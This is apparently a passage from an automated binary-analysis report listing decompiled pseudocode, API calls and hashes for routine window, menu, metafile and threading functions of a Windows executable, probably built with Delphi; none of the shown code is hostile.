0x004716c6
0x004716cb
0x004716cd
0x004716d4
0x004716e4
0x004716e4
0x004716cd
0x0047169f
0x0047165d
0x0047164e
0x00471567
0x00471560
0x00000000
0x0047155b

APIs

GetMessagePos.USER32 ref: 0047160B
GetMessagePos.USER32 ref: 00471619
ChildWindowFromPoint.USER32 ref: 00471645
GetClassNameA.USER32(00000000,00000000,00000000), ref: 00471683
SendMessageA.USER32 ref: 004716C6

Strings

SysHeader32, xrefs: 00471695

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$ChildClassFromNamePointSendWindow
String ID: SysHeader32
API String ID: 2510305242-2725536604
Opcode ID: c7d7b0a6ac5f74f308e2cd32c517e2bafc58c2ed1e88b2bff94cc20dd94be76f
Instruction ID: 6b2bad6963ab82c7d2df9250cbb17f493e62e620510ab16994f09dbd37808084
Opcode Fuzzy Hash: c7d7b0a6ac5f74f308e2cd32c517e2bafc58c2ed1e88b2bff94cc20dd94be76f
Instruction Fuzzy Hash: E4513270B005059BCB14EFBEC8829DEB7E5AF48304B14867BF819E7362D638ED058A59

Uniqueness

Uniqueness Score: -1.00%

Function 0043D5B4, Relevance: 10.7, APIs: 7, Instructions: 151
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0043D5B4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				void _v12;
				intOrPtr _v16;
				int _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _t85;
				void* _t113;
				intOrPtr _t129;
				intOrPtr _t138;
				void* _t141;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t113 = __ecx;
				_v8 = __eax;
				_t138 =  *0x491278; // 0x492c08
				 *((char*)(_v8 + 0x210)) = 1;
				_push(_t141);
				_push(0x43d77b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xffffffe0;
				E00435BA4(_v8, __ecx, __ecx, _t138);
				_v16 = _v16 + 4;
				E00436DCC(_v8,  &_v28);
				if(E004531A0() <  *(_v8 + 0x4c) + _v24) {
					_v24 = E004531A0() -  *(_v8 + 0x4c);
				}
				if(E004531AC() <  *(_v8 + 0x48) + _v28) {
					_v28 = E004531AC() -  *(_v8 + 0x48);
				}
				if(E00453194() > _v28) {
					_v28 = E00453194();
				}
				if(E00453188() > _v16) {
					_v16 = E00453188();
				}
				SetWindowPos(E0043C1F4(_v8), 0xffffffff, _v28, _v24,  *(_v8 + 0x48),  *(_v8 + 0x4c), 0x10);
				if(GetTickCount() -  *((intOrPtr*)(_v8 + 0x214)) > 0xfa && E00404600(_t113) < 0x64 &&  *0x4768fc != 0) {
					SystemParametersInfoA(0x1016, 0,  &_v12, 0);
					if(_v12 != 0) {
						SystemParametersInfoA(0x1018, 0,  &_v12, 0);
						if(_v12 == 0) {
							E00440808( &_v36);
							if(_v32 <= _v24) {
							}
						}
						 *0x4768fc(E0043C1F4(_v8), 0x64,  *0x00476A04 | 0x00040000);
					}
				}
				ShowWindow(E0043C1F4(_v8), 4);
				 *((intOrPtr*)( *_v8 + 0x7c))();
				_pop(_t129);
				 *[fs:eax] = _t129;
				_push(0x43d782);
				 *((intOrPtr*)(_v8 + 0x214)) = GetTickCount();
				_t85 = _v8;
				 *((char*)(_t85 + 0x210)) = 0;
				return _t85;
			}

0x0043d5c2
0x0043d5c3
0x0043d5c4
0x0043d5c5
0x0043d5c6
0x0043d5c8
0x0043d5cb
0x0043d5d4
0x0043d5dd
0x0043d5de
0x0043d5e3
0x0043d5e6
0x0043d5ee
0x0043d5f3
0x0043d5fd
0x0043d614
0x0043d623
0x0043d623
0x0043d638
0x0043d647
0x0043d647
0x0043d654
0x0043d65d
0x0043d65d
0x0043d66a
0x0043d673
0x0043d673
0x0043d699
0x0043d6b1
0x0043d6d9
0x0043d6e2
0x0043d6f1
0x0043d6fa
0x0043d708
0x0043d713
0x0043d713
0x0043d713
0x0043d737
0x0043d737
0x0043d6e2
0x0043d748
0x0043d752
0x0043d757
0x0043d75a
0x0043d75d
0x0043d76a
0x0043d770
0x0043d773
0x0043d77a

APIs

SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,0043D77B), ref: 0043D699
GetTickCount.KERNEL32 ref: 0043D69E
SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 0043D6D9
SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 0043D6F1
AnimateWindow.USER32(00000000,00000064,00000001), ref: 0043D737
ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,0043D77B), ref: 0043D748
GetTickCount.KERNEL32 ref: 0043D762

Part of subcall function 00440808: GetCursorPos.USER32(?), ref: 0044080C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
String ID:
API String ID: 3024527889-0
Opcode ID: c0251c773faf6aeb38ae199890a681a40f9054977bbdfca893ddb65535208a80
Instruction ID: 6018d5a9782b2466c3a615f03d0ee70380d541917bdbd0c30e30099fca95ef71
Opcode Fuzzy Hash: c0251c773faf6aeb38ae199890a681a40f9054977bbdfca893ddb65535208a80
Instruction Fuzzy Hash: AD516170A00109EFDB00EFA9C986E9EB3F5EF49304F2045AAF514E7251D779AE40DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0046E234, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 146
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0046E234(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t46;
				int _t56;
				void* _t68;
				void* _t71;
				void* _t85;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t97;
				intOrPtr _t102;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_v28 = 0;
				_t110 = __edx;
				_t85 = __eax;
				_push(_t113);
				_push(0x46e412);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xffffffe8;
				if(__edx == 0) {
					L8:
					if( *((intOrPtr*)(_t85 + 0x20c)) == 0) {
						L12:
						if(_t110 != 0 &&  *((intOrPtr*)(_t110 + 0x30)) ==  *((intOrPtr*)(_t85 + 0x30))) {
							_t92 =  *0x467bd8; // 0x467c24
							if(E00403768(_t110, _t92) == 0) {
								_t93 =  *0x4677c0; // 0x46780c
								if(E00403768(_t110, _t93) == 0) {
									_t94 =  *0x4688d0; // 0x46891c
									if(E00403768(_t110, _t94) == 0 && E0046E204(E00403524(_t110), "TDBEdit") == 0 && E0046E204(E00403524(_t110), "TDBMemo") == 0) {
										_t46 = E0043C4F8(_t85);
										_t132 = _t46;
										if(_t46 != 0) {
											E0046E440(_t85, _t110, _t132);
											_t56 = E0043C1F4(_t110);
											SendMessageA(E0043C1F4(_t85), 0x469, _t56, 0);
										}
										 *((intOrPtr*)(_t85 + 0x20c)) = _t110;
										_t97 =  *0x428db4; // 0x428e00
										if(E00403768(_t110, _t97) != 0) {
											E004086FC( *((short*)(_t85 + 0x21c)),  &_v28);
											E00435BA4(_t110, _t85, _v28, _t110);
										}
									}
								}
							}
						}
						_pop(_t91);
						 *[fs:eax] = _t91;
						_push(0x46e419);
						return E00404348( &_v28);
					}
					if(E0043C4F8(_t85) != 0) {
						SendMessageA(E0043C1F4(_t85), 0x469, 0, 0);
					}
					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
					goto L12;
				}
				_t68 = E0043907C( *((intOrPtr*)(__eax + 0x30))) - 1;
				if(_t68 >= 0) {
					_v8 = _t68 + 1;
					_t108 = 0;
					do {
						_t71 = E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108);
						_t102 =  *0x467bd8; // 0x467c24
						if(E00403768(_t71, _t102) != 0 && _t85 != E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) && _t110 ==  *((intOrPtr*)(E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) + 0x20c))) {
							_v24 =  *((intOrPtr*)(_t110 + 8));
							_v20 = 0xb;
							_v16 =  *((intOrPtr*)(E00439040( *((intOrPtr*)(_t85 + 0x30)), _t108) + 8));
							_v12 = 0xb;
							_t89 =  *0x491254; // 0x465870
							E0040A250(_t85, _t89, 1, _t108, _t110, 1,  &_v24);
							E00403DA8();
						}
						_t108 = _t108 + 1;
						_t16 =  &_v8;
						 *_t16 = _v8 - 1;
					} while ( *_t16 != 0);
				}
			}

0x0046e23f
0x0046e242
0x0046e244
0x0046e248
0x0046e249
0x0046e24e
0x0046e251
0x0046e256
0x0046e2ed
0x0046e2f4
0x0046e31f
0x0046e321
0x0046e335
0x0046e342
0x0046e34a
0x0046e357
0x0046e35f
0x0046e36c
0x0046e39e
0x0046e3a3
0x0046e3a5
0x0046e3ab
0x0046e3b4
0x0046e3c7
0x0046e3c7
0x0046e3cc
0x0046e3d4
0x0046e3e1
0x0046e3ed
0x0046e3f7
0x0046e3f7
0x0046e3e1
0x0046e36c
0x0046e357
0x0046e342
0x0046e3fe
0x0046e401
0x0046e404
0x0046e411
0x0046e411
0x0046e2ff
0x0046e312
0x0046e312
0x0046e319
0x00000000
0x0046e319
0x0046e264
0x0046e267
0x0046e26e
0x0046e271
0x0046e273
0x0046e278
0x0046e27d
0x0046e28a
0x0046e2af
0x0046e2b2
0x0046e2c3
0x0046e2c6
0x0046e2d0
0x0046e2dd
0x0046e2e2
0x0046e2e2
0x0046e2e7
0x0046e2e8
0x0046e2e8
0x0046e2e8
0x0046e273

APIs

SendMessageA.USER32 ref: 0046E312
SendMessageA.USER32 ref: 0046E3C7

Strings

TDBEdit, xrefs: 0046E379
TDBMemo, xrefs: 0046E38E
pXF, xrefs: 0046E2D0
$|F, xrefs: 0046E27D, 0046E335

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: $|F$TDBEdit$TDBMemo$pXF
API String ID: 3850602802-2244556849
Opcode ID: e5ea7f58dfe15059218696f4bfb16ac77a01b2a9494904b98044b0598c7e998e
Instruction ID: 42a2ebdc86a7ceb2cdf3d471dffb8ad084e77520ad1fa4256563c2d205324a6a
Opcode Fuzzy Hash: e5ea7f58dfe15059218696f4bfb16ac77a01b2a9494904b98044b0598c7e998e
Instruction Fuzzy Hash: 71413A746102105BCB10EF6BC991A5A77E9AF45708F10907BAC00AB3A3EA7DEC458B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00423240, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00423240(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				struct HDC__* _t43;
				void* _t65;
				intOrPtr _t67;
				intOrPtr _t77;
				void* _t80;
				void* _t83;
				void* _t85;
				intOrPtr _t86;

				_t83 = _t85;
				_t86 = _t85 + 0xffffffdc;
				_t80 = __edx;
				_t65 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402EF0( &_v38, 0x16);
					_t67 =  *((intOrPtr*)(_t65 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t67 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t67 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t67 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_t43 = E00421844( &_v38);
					_v18 = _t43;
					_push(0);
					L00406EA4();
					_v16 = _t43;
					_push(_t83);
					_push(0x42337b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					_v12 = GetWinMetaFileBits( *(_t67 + 8), 0, 0, 8, _v16);
					_v8 = E00402754(_v12);
					_push(_t83);
					_push(0x42335b);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					if(GetWinMetaFileBits( *(_t67 + 8), _v12, _v8, 8, _v16) < _v12) {
						E00420A54(_t67);
					}
					E00416B18(_t80, 0x16,  &_v38);
					E00416B18(_t80, _v12, _v8);
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(E00423362);
					return E00402774(_v8);
				}
			}

0x00423241
0x00423243
0x00423248
0x0042324a
0x00423250
0x00423387
0x00423256
0x00423260
0x00423265
0x00423268
0x0042326f
0x00423276
0x00423280
0x00423278
0x00423278
0x00423278
0x00423297
0x004232ae
0x004232b5
0x004232ba
0x004232be
0x004232c0
0x004232c5
0x004232ca
0x004232cb
0x004232d0
0x004232d3
0x004232e9
0x004232f4
0x004232f9
0x004232fa
0x004232ff
0x00423302
0x0042331f
0x00423321
0x00423321
0x00423330
0x0042333d
0x00423344
0x00423347
0x0042334a
0x0042335a
0x0042335a

APIs

MulDiv.KERNEL32(?,?,000009EC), ref: 00423292
MulDiv.KERNEL32(?,?,000009EC), ref: 004232A9
72E7AC50.USER32(00000000,?,?,000009EC,?,?,000009EC), ref: 004232C0
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?,00000000,0042337B,?,00000000,?,?,000009EC,?,?,000009EC), ref: 004232E4
GetWinMetaFileBits.GDI32(?,?,?,00000008,?,00000000,0042335B,?,?,00000000,00000000,00000008,?,00000000,0042337B), ref: 00423317

Strings

`, xrefs: 00423278

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: def7def30d5504c3a779a3c648b4e8f64b84dfcbde0fafac2c69354ed9fbbb2f
Instruction ID: d07a96629a61a65ab75161e25bb4c2be328d2c6da99f1a666cfa25fa5b2d3ef1
Opcode Fuzzy Hash: def7def30d5504c3a779a3c648b4e8f64b84dfcbde0fafac2c69354ed9fbbb2f
Instruction Fuzzy Hash: 70313275B04258ABDB00DF95D881AAEB7B8EF08704F5144A6F904FB281D7789E40DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041C04C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041C04C() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x491298; // 0x492030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x491118; // 0x410414
					E0040A250(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403DA8();
				}
				if( *0x492a00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x492a04);
					L004068AC();
					_push(_t58);
					_push(0x41c162);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x4764b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x4764b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x4764b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x4764b8; // 0x0
							_v12 = E004141BC(_t22, 0);
							_t24 =  *0x4764b8; // 0x0
							E004140AC(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41c115, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x492a00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041C16D);
					_push(0x492a04);
					L004069F4();
					return 0;
				}
			}

0x0041c04d
0x0041c04f
0x0041c052
0x0041c053
0x0041c054
0x0041c055
0x0041c05a
0x0041c062
0x0041c069
0x0041c06c
0x0041c076
0x0041c083
0x0041c088
0x0041c088
0x0041c094
0x0041c169
0x0041c176
0x0041c09a
0x0041c09a
0x0041c09f
0x0041c0a6
0x0041c0a7
0x0041c0ac
0x0041c0af
0x0041c0b9
0x0041c0c6
0x0041c0c6
0x0041c0bb
0x0041c0bb
0x0041c0c4
0x0041c0ca
0x00000000
0x00000000
0x00000000
0x0041c0c4
0x0041c0cc
0x0041c0d3
0x0041c138
0x0041c138
0x0041c141
0x00000000
0x00000000
0x0041c0d9
0x0041c0e3
0x0041c0e8
0x0041c0ed
0x0041c0fd
0x0041c108
0x0041c10d
0x0041c110
0x0041c133
0x0041c133
0x0041c143
0x0041c143
0x0041c14c
0x0041c14f
0x0041c152
0x0041c157
0x0041c15c
0x0041c161
0x0041c161

APIs

GetCurrentThreadId.KERNEL32 ref: 0041C055
GetCurrentThreadId.KERNEL32 ref: 0041C064
RtlEnterCriticalSection.KERNEL32(00492A04,?,?,00000000), ref: 0041C09F
SetEvent.KERNEL32(?,?,00492A04,?,?,00000000), ref: 0041C133
RtlLeaveCriticalSection.KERNEL32(00492A04,0041C16D,00492A04,?,?,00000000), ref: 0041C15C

Strings

0 I, xrefs: 0041C05A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalCurrentSectionThread$EnterEventLeave
String ID: 0 I
API String ID: 130076905-1101979924
Opcode ID: 4784148f2ae588830669afe7527ee21dc11d938f8ae2d1df5870d658aaf90949
Instruction ID: 94935ce0e79f478707c4f0092ec789d221ad1f1ce9d64de937dfad475c4fce94
Opcode Fuzzy Hash: 4784148f2ae588830669afe7527ee21dc11d938f8ae2d1df5870d658aaf90949
Instruction Fuzzy Hash: 4A314835684280EFD710DB69DC81BAA7BE4EB49304F1680BBE405936A2C77D58C0CB2C

Uniqueness

Uniqueness Score: -1.00%

Function 004457D4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004457D4(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E004457D4(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E00445904(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E00445904(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E00445904(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E004456A0(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x4442f4; // 0x444340
						if(E00403768( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00445904(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

0x004457d4
0x004457d8
0x004457de
0x004457e8
0x004457ea
0x00000000
0x004457ea
0x004457f3
0x004457f8
0x00000000
0x004457fa
0x0044580c
0x00445811
0x00445815
0x0044581a
0x00445823
0x0044582d
0x00445834
0x00445844
0x00445849
0x00445849
0x0044584b
0x0044584c
0x00445852
0x00445858
0x0044588d
0x0044588f
0x00445894
0x00000000
0x0044589a
0x0044585d
0x0044586a
0x00000000
0x0044587d
0x00445881
0x00445888
0x00000000
0x00445888
0x0044586a
0x00445852
0x004458a1

Strings

@CD, xrefs: 0044585D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: @CD
API String ID: 0-624872861
Opcode ID: 17d3a8e1011081918dbed822c41ac9534dfc0f55005bde3bc3fbf6dfbce4f4f7
Instruction ID: a350e4e5298d38d449358e174567392fc5b2a5dee204b2a5268803923fd81d6a
Opcode Fuzzy Hash: 17d3a8e1011081918dbed822c41ac9534dfc0f55005bde3bc3fbf6dfbce4f4f7
Instruction Fuzzy Hash: F4117561B01A49ABEE60BE7A8D0575B37889F8175CF04042BBC059F353DE7CCC25865C

Uniqueness

Uniqueness Score: -1.00%

Function 004551E4, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004551E4(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x492714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t20 =  *((intOrPtr*)(_t33 + 0x44));
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00432A88(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043C1F4(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}

0x004551e4
0x004551e8
0x004551ea
0x004551ec
0x004551ee
0x004551f6
0x00455295
0x0045529b
0x00455207
0x0045520c
0x00455210
0x00455276
0x00455293
0x00455293
0x00000000
0x00455276
0x00455212
0x00455214
0x00455219
0x00455234
0x0045523d
0x00455232
0x00000000
0x00455232
0x00455245
0x00455247
0x00455247
0x00000000
0x00455223
0x00455228
0x00455249
0x00455262
0x00455264
0x00455264
0x00000000
0x00455262
0x00455219

APIs

GetCapture.USER32 ref: 00455207
SendMessageA.USER32 ref: 0045525B
GetWindowLongA.USER32 ref: 0045526B
SendMessageA.USER32 ref: 0045528A

Strings

dZG, xrefs: 004551E5

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CaptureLongWindow
String ID: dZG
API String ID: 1158686931-410245891
Opcode ID: fad3518948819a6feef1e5a3d68b9e05a647f4bfc9ed138af2eda57894bfc5c0
Instruction ID: 312b808e23363fad402cddb0ed21c048764b3ff5ec72132a34d4933a1a5ad938
Opcode Fuzzy Hash: fad3518948819a6feef1e5a3d68b9e05a647f4bfc9ed138af2eda57894bfc5c0
Instruction Fuzzy Hash: 9511AC70304A099FD620BA9AD990B3773DCAF19301F1004BEBD6AD7343DA68EC448B69

Uniqueness

Uniqueness Score: -1.00%

Function 00427598, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00427598(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x492ac9 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x492ab0; // 0x427598
					 *0x492ab0 = E00427194(5, _t23, _t26, _t27, _t29);
					_t24 =  *0x492ab0(_t27, _t29);
				}
				return _t24;
			}

0x004275a1
0x004275a4
0x004275ae
0x004275d3
0x004275db
0x004275fb
0x00427600
0x0042760b
0x00427616
0x00427620
0x00427621
0x00427622
0x00427623
0x00427624
0x00427625
0x0042762f
0x00427631
0x00427639
0x0042763a
0x0042763a
0x0042763f
0x0042763f
0x004275b0
0x004275b5
0x004275c2
0x004275cf
0x004275cf
0x00427649

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004275F0
GetSystemMetrics.USER32 ref: 00427605
GetSystemMetrics.USER32 ref: 00427610
lstrcpy.KERNEL32(?,DISPLAY), ref: 0042763A

